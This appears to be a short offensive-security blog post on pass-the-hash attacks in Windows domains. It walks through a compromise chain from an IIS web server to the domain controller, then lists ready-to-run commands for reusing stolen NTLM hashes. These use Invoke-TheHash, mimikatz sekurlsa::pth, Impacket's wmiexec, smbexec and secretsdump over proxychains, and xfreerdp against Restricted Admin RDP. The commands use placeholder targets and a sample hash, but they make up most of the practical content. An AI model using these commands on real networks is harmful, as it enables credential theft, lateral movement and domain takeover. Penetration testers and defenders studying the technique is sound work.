Consider this:

  • Threat actor compromises your website running on IIS
  • Successfully elevated privileges to SYSTEM
  • Domain user with admin privileges logged-in in the past and thus has their password hash saved in the local machine.
  • Actor dumped SAM and LSA hashes, revealing usernames & password hashes (sometimes clear-text)
  • Usernames are checked against the domain for privileges, e.g. net user SomeUser /domain
  • After verifying the user is Domain Admin, actor can move laterally and authenticate to the Domain Controller machine without knowing the actual admin password

It’s a very straight to the point scenario and sometimes the attack route isn’t so direct. Nevertheless, the security issue of being able to essentially reuse hashes could be devastating when left unchecked.

If you’re not pivoting into the network, there are several options. Like using Invoke-TheHash.

Import-Module ./Invoke-TheHash.psd1
Invoke-WMIExec -Target 'HOST' -Domain 'DOMAIN' -Username 'USER' -Hash 'bc5473e951d0924378d90806da99b257' -Command 'cmd.exe /c calc'

Of course, mimikatz supports pass-the-hash attacks as well.

Invoke-Mimikatz "sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:AAD3B435B51404EEAAD3B435B51404EE:bc5473e951d0924378d90806da99b257 /run:`"cmd.exe /c calc`""

With Impacket’s suite of tools.

proxychains4 -q wmiexec.py USER@HOST -hashes 'AAD3B435B51404EEAAD3B435B51404EE:bc5473e951d0924378d90806da99b257'
proxychains4 -q smbexec.py USER@HOST -hashes 'AAD3B435B51404EEAAD3B435B51404EE:bc5473e951d0924378d90806da99b257'
proxychains4 -q secretsdump.py USER@HOST -hashes 'AAD3B435B51404EEAAD3B435B51404EE:bc5473e951d0924378d90806da99b257'

Microsoft did introduce Restricted Admin Mode to try and mitigate this attack. However, this feature inadvertently enabled Pass-the-Hash attacks against RDP. Original research by labs.portcullis.co.uk

This attack can be used on Server 2012 R2 or Windows 8.1.

proxychains4 -q xfreerdp /u:USER /d:DOMAIN /pth:bc5473e951d0924378d90806da99b257 /v:RDPHOST